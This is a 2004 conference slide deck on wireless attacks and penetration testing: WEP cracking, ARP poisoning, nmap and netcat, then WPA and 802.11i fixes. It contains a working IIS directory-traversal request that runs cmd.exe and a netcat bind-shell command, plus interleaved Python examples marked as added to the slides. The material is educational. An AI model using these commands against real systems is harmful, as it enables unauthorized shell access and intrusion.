Wireless Attacks and Penetration Testing Techniques - PowerPoint PPT Presentation

1
Wireless Attacks and Penetration Testing
Techniques
  • Jonathan Hassell
  • Lockdown
  • UW-Madison
  • Thursday, August 5, 2004

2
About the Presenter
  • Books
  • RADIUS, O'Reilly and Associates
  • Hardening Windows, Apress
  • Managing Windows Server 2003, O'Reilly and
    Associates (October 2004)
  • Using Small Business Server 2003, Apress (2005)
  • Articles
  • SecurityFocus, http://www.securityfocus.com
  • PC Pro, Windows & .NET Magazine Network

3
Today's Agenda
  • Types of Wireless Attacks
  • Other WLAN Security Considerations
  • Anatomy of a Pen-test
  • Fixing WEP Problems
  • Recent Developments in WLAN Security
  • Q&A (subject to time constraints)

4
WLAN Security
  • Multiple venues for attack
  • Signal boundaries
  • Virtual port
  • Primary forms of attack
  • Denial of Service (DoS)
  • Man-in-the-Middle
  • ARP Poisoning

5
Denial of Service (DoS)
  • Objective: prevent users from accessing network
    resources
  • Physical layer attacks
  • Interference
  • Lack of evidence
  • Data link layer attacks
  • Antenna hacks
  • Spoofed access points
  • Network layer attacks
  • Big ping requests

6
Man-in-the-Middle Attacks
  • Objectives
  • I: to eavesdrop
  • II: more nefariously, to manipulate and modify
  • Eavesdropping
  • Manipulation
  • Prevention

7
ARP Poisoning
  • Objective: eavesdropping and manipulation
  • Address Resolution Protocol
  • Cache
  • Modern OSes are L-A-Z-Y!
  • Structure of the attack
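The cache-poisoning symptom this slide describes, as an added example that is not part of the presentation: an arpwatch-style monitor run over constructed ARP replies. It flags an IP that starts answering from a different MAC, and pins the gateway's MAC (a constructed value) so the very first bogus reply already alerts.

```python
# Added example (not from the slides): arpwatch-style detection of ARP cache
# poisoning. OSes accept unsolicited replies (the "lazy" cache), so the
# monitor keeps its own IP->MAC table and alerts when a binding changes.

# Constructed sample traffic: (sender_ip, sender_mac) taken from ARP replies.
# Replies 3 and 4 claim the gateway's IP from an unexpected adapter.
SAMPLE_ARP_REPLIES = [
    ("192.168.0.1", "00:0c:29:aa:bb:01"),   # gateway, legitimate
    ("192.168.0.2", "00:0c:29:aa:bb:02"),   # the IIS host from the slides
    ("192.168.0.1", "00:0C:29:AA:BB:99"),   # gateway IP, different MAC
    ("192.168.0.1", "00:0c:29:aa:bb:99"),   # poisoners repeat to keep caches fresh
    ("192.168.0.2", "00:0c:29:aa:bb:02"),
]

# Pinned bindings for hosts that must never move (constructed gateway MAC).
STATIC_BINDINGS = {"192.168.0.1": "00:0c:29:aa:bb:01"}

def detect_arp_changes(replies, pinned=STATIC_BINDINGS):
    """Return (ip, trusted_mac, claimed_mac) for every reply that rebinds an IP.

    The first MAC seen for an unpinned IP is trusted; a pinned IP is trusted
    only at its configured MAC, so even the first bogus reply is reported.
    The table is never overwritten by a conflicting reply, which is exactly
    what a poisoned host's own cache fails to do.
    """
    table = {ip: mac.lower() for ip, mac in pinned.items()}
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        trusted = table.get(ip)
        if trusted is None:
            table[ip] = mac
        elif trusted != mac:
            alerts.append((ip, trusted, mac))
    return alerts

def suspect_macs(alerts):
    """MACs that claimed someone else's IP, ranked by how often they did so."""
    counts = {}
    for _ip, _trusted, claimed in alerts:
        counts[claimed] = counts.get(claimed, 0) + 1
    return sorted(counts.items(), key=lambda kv: -kv[1])

if __name__ == "__main__":
    found = detect_arp_changes(SAMPLE_ARP_REPLIES)
    for ip, trusted, claimed in found:
        print(f"ALERT {ip}: trusted {trusted}, now claimed by {claimed}")
    print("suspect adapters:", suspect_macs(found))
```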

8
Other WLAN Security Issues
  • War Driving
  • War dialing
  • Warchalking
  • Wired Equivalent Privacy (WEP)
  • The premise
  • The 24-bit problem
  • The result
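The "24-bit problem" and its result, as an added example that is not part of the presentation: WEP seeds RC4 with IV || secret key, so two frames sent under the same IV share a keystream and XORing their ciphertexts cancels the key. The same block quantifies how quickly a 24-bit IV must repeat versus the 48-bit counter that 802.11i introduces (the "100 years" point of a later slide). The key, IV and frame bodies are constructed values.

```python
# Added example (not from the slides): why WEP's 24-bit IV is the problem.
# WEP seeds RC4 with IV || secret key, so two frames sent under the same IV
# share a keystream and c1 XOR c2 == p1 XOR p2, with the key cancelled out.
# iv_exhaustion() shows how soon a 24-bit counter repeats versus the 48-bit
# counter 802.11i introduces.
import math

def rc4_keystream(key, length):
    """Plain RC4 (KSA then PRGA), as WEP uses it with key = IV || secret."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = [], 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(iv, secret, plaintext):
    """WEP-style body encryption: RC4(IV || secret) XOR plaintext (ICV omitted)."""
    stream = rc4_keystream(iv + secret, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, stream))

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def iv_exhaustion(iv_bits, frames_per_second):
    """(frames until a 50% chance of an IV collision, seconds to use every IV once)."""
    space = 2 ** iv_bits
    birthday_frames = round(math.sqrt(2 * math.log(2) * space))
    return birthday_frames, space / frames_per_second

if __name__ == "__main__":
    SECRET = bytes.fromhex("0102030405")        # constructed 40-bit WEP key
    IV = bytes.fromhex("000001")                # 24-bit IV reused by both frames
    p1, p2 = b"GET / HTTP/1.0", b"POST /x HTTP/1"
    c1, c2 = wep_encrypt(IV, SECRET, p1), wep_encrypt(IV, SECRET, p2)
    assert xor_bytes(c1, c2) == xor_bytes(p1, p2)   # key gone, plaintext relation exposed
    for bits in (24, 48):
        frames, seconds = iv_exhaustion(bits, 500)
        print(f"{bits}-bit IV: ~{frames} frames to a likely repeat, "
              f"{seconds / 86400:.1f} days to exhaust at 500 frames/s")
```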

9
Anatomy of a Penetration Test
  • Four phases
  • Gaining access
  • Finding available servers
  • Determining available services
  • Exploiting a known vulnerability

10
Phase 1: WEP Key Cracking
  • AirSnort
  • Passively monitor transmissions
  • Derive encryption key with an adequate number of
    collected packets (5-10 million)
  • ALL 802.11b networks with 40/128-bit WEP
    encryption are vulnerable

11
Phase 1 continued
  • Once you press Start
  • Weak IVs expose one key byte
  • AirSnort collects these weak IVs and sorts them
    by exposed key byte
  • Computes probable value for that key byte using
    advanced statistics
  • Lather, rinse, repeat for each key byte
  • Big guess to generate probable entire key
  • Then -- associate and attack!

12
Phase 1 continued
  • AirSnort

13
Phase 2: Port Scanning
  • Detect anomalies and openings from the outside
  • NMAP
  • www.insecure.org
  • The standard on Linux

14
Phase 2 continued
  • [root@mailedge root]# nmap jonathanhassell.com
  • Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
  • Interesting ports on cpe-069-132-170-148.carolina.
    rr.com (69.132.170.148)
  • (The 1596 ports scanned but not shown below are
    in state filtered)
  • Port State Service
  • 25/tcp open smtp
  • 80/tcp open http
  • 113/tcp closed auth
  • 443/tcp open https
  • 444/tcp open snpp
  • Nmap run completed -- 1 IP address (1 host up)
    scanned in 170 seconds

15
Phase 3: Identify Vulnerable Apps
  • Probe those open ports to see what lies beneath
  • NetCat, the Swiss Army knife
  • Send improperly crafted packets
  • Create connections
  • Grab and send input and output

16
Phase 3 continued
  • Recall that port 80 is open!
  • Use NetCat to get service banner
  • linux# netcat -v -n 192.168.0.2 80
  • (UNKNOWN) [192.168.0.2] 80 (?) open
  • GET HTTP
  • HTTP/1.1 400 Bad Request
  • Server: Microsoft-IIS/5.0
  • Date: Tue, 01 Jun 2004 22:56:11 GMT
  • Content-Type: text/html
  • Content-Length: 87
  • Connection: close
  • Content-Length: 34
  • <html><head><title>Error</title></head><body>The
    parameter
  • </html>

17
Phase 4: Cracking It
  • We're still using NetCat
  • linux# netcat -v -n 192.168.0.2 80
  • (UNKNOWN) [192.168.0.2] 80 (?) open
  • GET http://192.168.0.2/SCRIPTS/..%255C../WINNT/SYS
    TEM32/CMD.EXE?/C+DIR+C:
  • You have just returned a listing of all contents
    of the C drive.
  • You also know how to spawn a command shell.
  • The system is cracked.
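The class of bug behind that request, as an added example that is not part of the presentation and is not IIS code: "%25" decodes to "%", so one decoding pass turns "..%255C.." into "..%5C..", a harmless-looking directory name that passes a containment check, and a second pass turns it into "..\.." before the file is opened. The vulnerable resolver checks between the two passes; the hardened one decodes to a fixed point and checks the canonical result. WEBROOT and both function names are constructed for illustration.

```python
# Added example (not from the slides, and not IIS code): the decode-ordering
# defect behind "..%255C..". A check done after one percent-decoding pass sees
# "..%5C..", which does not traverse; the second decode, done after the check,
# yields "..\.." and the resolved path leaves the web root.
import posixpath
from urllib.parse import unquote

WEBROOT = "/inetpub/wwwroot"          # constructed document root

def _inside_root(path):
    return path == WEBROOT or path.startswith(WEBROOT + "/")

def vulnerable_resolve(request_path):
    """Decode once, check containment, then decode AGAIN before use (the bug)."""
    once = unquote(request_path)
    if not _inside_root(posixpath.normpath(WEBROOT + once)):
        raise PermissionError("traversal rejected")
    twice = unquote(once).replace("\\", "/")          # second decode after the check
    return posixpath.normpath(WEBROOT + twice)         # may now lie outside WEBROOT

def hardened_resolve(request_path, max_rounds=3):
    """Decode to a fixed point, canonicalise once, then check the final path."""
    decoded = request_path
    for _ in range(max_rounds):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    else:                                              # still changing: refuse it
        raise PermissionError("excessive encoding")
    decoded = decoded.replace("\\", "/")
    target = posixpath.normpath(posixpath.join(WEBROOT, decoded.lstrip("/")))
    if not _inside_root(target):
        raise PermissionError("traversal rejected")
    return target

if __name__ == "__main__":
    probe = "/SCRIPTS/..%255C../WINNT/SYSTEM32/CMD.EXE"   # the slide's path, minus query
    print("vulnerable:", vulnerable_resolve(probe))      # escapes to /inetpub/WINNT/...
    try:
        hardened_resolve(probe)
    except PermissionError as err:
        print("hardened:", err)
```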

18
Phase 4 continued
  • Other crappy things crackers can do with NetCat
  • Leave it running
  • nc -L -p 7896 -d -e cmd.exe
  • Spawns CMD.EXE when a connection is made to port
    7896
  • Other tools crackers can use to do crappy things
  • Whisker

19
DISCLAIMER
  • That attack is old!
  • It should have been patched!
  • Demonstration purposes only
  • The points
  • NetCat is your best friend and worst enemy.
  • Some hacks really are this simple.
  • Know thine enemy.

20
Fixing WEP Problems
  • Basic steps
  • Use longer keys
  • Change keys frequently
  • Use APs on dedicated, firewalled ports
  • Use VPNs for sensitive data
  • Use other techniques
  • IPsec
  • Etc.

21
Fixing WEP Problems, Part II
  • Upgrade firmware
  • Weak IV exploit is virtually non-existent.
  • Is this the band-aid we need?
  • Look at the problem itself!
  • Firmware upgrades are nothing more than a stopgap

22
Wi-Fi Protected Access (WPA)
  • Temporal Key Integrity Protocol (TKIP)
  • Core component
  • Does what WEP doesn't
  • Stronger algorithm but works on current HW
  • Verifies security configuration after keys are
    determined
  • Synchronizes changing key for each frame

23
WPA-PSK
  • WPA-Pre-Shared Key (PSK)
  • Simplified but still powerful form of WPA, suitable for
    small business and home networking
  • Sets an initial static key
  • TKIP takes over the rest, changing at regular
    interval

24
WPA-Enterprise
  • TKIP still used, as described in previous slide
  • Add back-end authentication server
  • Uses Extensible Authentication Protocol (EAP)
  • Most of the time, RADIUS is used
  • EAP-over-RADIUS

25
And The Other Shoe Drops
  • Problems with WPA
  • WPA passphrases containing dictionary words less
    than 20 characters long could possibly be cracked
  • EAP itself transmits in cleartext; there isn't
    any encryption.
  • Transport Layer Security (TLS)
  • Requires certificates on all clients
  • TTLS solves that problem
  • Cisco and Microsoft Protected EAP (PEAP)
  • Most experts see this as the winner

26
WPA Support
  • Windows XP
  • Home or Professional
  • Service Pack 1 plus additional patch
  • Service Pack 2 will have additional patch
    included
  • What if you don't have a RADIUS back-end?
  • Linksys Wireless Guard

27
Looking at the Crystal Ball
  • The Future is 802.11i
  • Includes TKIP
  • 100 years of continuous transmission to deplete
    the keyspace
  • More efficient and direct mechanism to detect
    packet tampering
  • Advanced Encryption Standard (AES)
  • Probably need new hardware to perform these
    advanced calculations

28
Recapping Today's Session
  • Types of Wireless Attacks
  • DoS, Man-in-the-Middle, ARP Poisoning
  • Other WLAN Security Considerations
  • War driving, WEP and its weaknesses
  • Anatomy of a Pen-test
  • Breaking key, scanning, identifying, cracking
  • Fixing WEP Problems
  • WEP stopgaps, WPA-PSK, WPA-Enterprise
  • Recent Developments in WLAN Security
  • TTLS/PEAP, AES with 802.11i

29
THANK YOU!
  • I sincerely hope this was helpful
  • Contact e-mail: JHASSELL@GMAIL.COM
  • Seminar information at http://www.hardeningwin.com
  • If you liked this, please tell the venue
  • If you didn't, send me an e-mail and tell me why!

30
WLAN Security: Question and Answer Session
  • Lockdown
  • Univ. of Wisconsin at Madison
  • Thursday, August 5, 2004